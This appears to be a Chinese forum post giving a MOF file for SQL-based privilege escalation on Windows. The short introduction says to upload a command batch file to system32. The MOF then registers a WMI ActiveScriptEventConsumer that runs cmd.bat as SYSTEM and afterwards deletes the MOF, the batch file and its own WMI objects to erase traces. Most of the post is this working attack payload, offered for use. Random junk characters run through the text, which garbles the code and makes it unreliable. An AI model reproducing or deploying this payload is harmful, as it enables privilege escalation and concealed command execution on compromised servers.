这个sql提权MOF需要运行 system下的文件,不能定义路径。" a- j, _3 i) `+ X1 M [$ ?
需要将要运行的命令写入到bat上传到system32目录,然后执行。) q* T( l3 m$ N! o5 c" b2 W
! `5 j4 ]: A) _8 X! |
这个sql提权MOF需要运行 system下的文件,不能定义路径。# ~- R- K4 g( z4 W
需要将要运行的命令写入到bat上传到system32目录,然后执行。
1 r, V: e0 U: j
7 h1 {: x" G K) ^9 N5 P% I0 |#pragma, z4 {$ `" q1 A B; j
namespace("\\\\.\\root\\cimv2")
3 A3 ^1 B% _. I* d' x' v7 ~ class, \( |0 G8 _8 x. i
MyClass547: T. E' B- }4 p2 M
{ [key]1 }, p) y, |& y8 D& a
string
7 ]8 r- s1 y) Y7 D) | Name;
3 w% k# g* F, d };
( z1 h" b, P7 R/ m" q& o class
% Y, G7 _8 |' I0 {. J4 J; G ActiveScriptEventConsumer
, p: _- S4 {+ K u. G; X& P : __EventConsumer { [key]/ W% U0 m7 {3 a# `3 a' n+ X
string
/ O1 ~" D9 j) E) F; u Name; [not_null]
; |" G' b% g; S5 g4 o. x string
4 l7 n. v, d+ J" y$ I ScriptingEngine; string
, F. l' r, X) Q/ S8 i% [5 E% h ScriptFileName; [template]
- ]* S/ X, ?, O. K, q$ b string
) f& F7 _$ s! C8 Y ScriptText; uint32 KillTimeout;3 G4 G& g' V' _& ^7 L/ z& U
}; instance of __Win32Provider as $P {
9 h, s9 s5 U1 l6 Q; R9 p s6 m Name r( C1 d) y8 o: L2 H% @9 P2 k; }
=
% a$ c4 A8 `! ~* r' n "ActiveScriptEventConsumer"; CLSID =
: w* o, x8 \5 M2 W- C5 ^3 C5 e8 C "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";! I |9 P' ]: N: S; w p
PerUserInitialization: r2 U! w5 Z- N2 V2 O
= TRUE;
7 O/ e. o3 y/ S# z: M9 b }; instance of __EventConsumerProviderRegistration { Provider/ F; u1 X; e# @2 g
= $P; ConsumerClassNames
/ X) q, |) A, I/ Y9 a$ {" Q' Z =. y' Z e( t; \0 j1 F& k$ E0 a
{"ActiveScriptEventConsumer"};# L1 A/ X) C) f* H0 [- m9 r
};! W) _, v7 Y9 Y0 f
Instance of ActiveScriptEventConsumer
" G8 u& s# z% V" J; p# q0 ^! ~ as $cons { Name
" H6 z' O5 S7 K: J, `/ _. S+ E5 A =
* A) D- Q! b3 w "ASEC"; ScriptingEngine
7 D3 s& }. y5 B' g: L& L; v =/ h, F( L& c7 v( s
"JScript"; ScriptText x$ A. O* Q2 c4 M: y
=2 z* W' q$ n; k" \ D9 O3 c+ Q
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };0 F& I) r# S/ K
Instance of ActiveScriptEventConsumer8 T8 Y4 G: L4 \5 s' a- q8 D
as $cons2 { Name- ]& h: A& F& t2 K+ Z! W/ W
=
# _0 C4 H( [ s% l2 _- \( j/ H "qndASEC"; ScriptingEngine
4 s! Z0 y1 q2 r' A" A = [# t( J) v+ D' d- \6 f: I _6 ]
"JScript"; ScriptText" `' ~! M7 c7 z( T) s" Q. `
=
3 X5 m" t' t" f Z "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";$ N% k) @1 C. o8 H
}; instance of __EventFilter as $Filt { Name
) z9 d: Z/ _/ u" m1 @/ c =7 b: \# ?' l% a! N, w o, r
"instfilt"; Query; G- n4 t b! {1 G
=
. q! H# B9 X" | "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
1 ]1 r9 M9 r& V o4 l1 K, v7 C =) E" Z1 o1 i( m( a
"WQL"; }; instance of __EventFilter as $Filt2 { Name
. k* z/ U+ K& P. \% @- d1 ]" t =5 A; t S7 S/ s; \
"qndfilt"; Query
+ S0 w, i7 h! O* V6 ` =
, }" @) \% I. Q, u: ?# G "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage9 V4 l+ W: `' X
=
- v' {* U. l% o: Z% t "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer" J' s$ I; ]9 G3 n
= $cons; Filter
& V% x$ {' P1 d( [7 p = $Filt;# U/ V) r* I7 k' S6 F7 V
}; instance of __FilterToConsumerBinding as $bind2 { Consumer2 x: A7 P- ?) z7 s5 m) i; \5 Q
= $cons2; Filter
, z( D. }# x9 M0 E = $Filt2;2 H9 I+ \1 ?6 |' L2 O
}; instance of MyClass547" n* R3 q8 s" W! l8 K3 h8 h
as $MyClass { Name8 v" }; k9 v5 j* Q U6 ?( j6 Y/ o
=* K+ D! i0 U2 P7 ]; R. v) b
"ClassConsumer";
2 n/ e* W2 e- [ E! ] }; |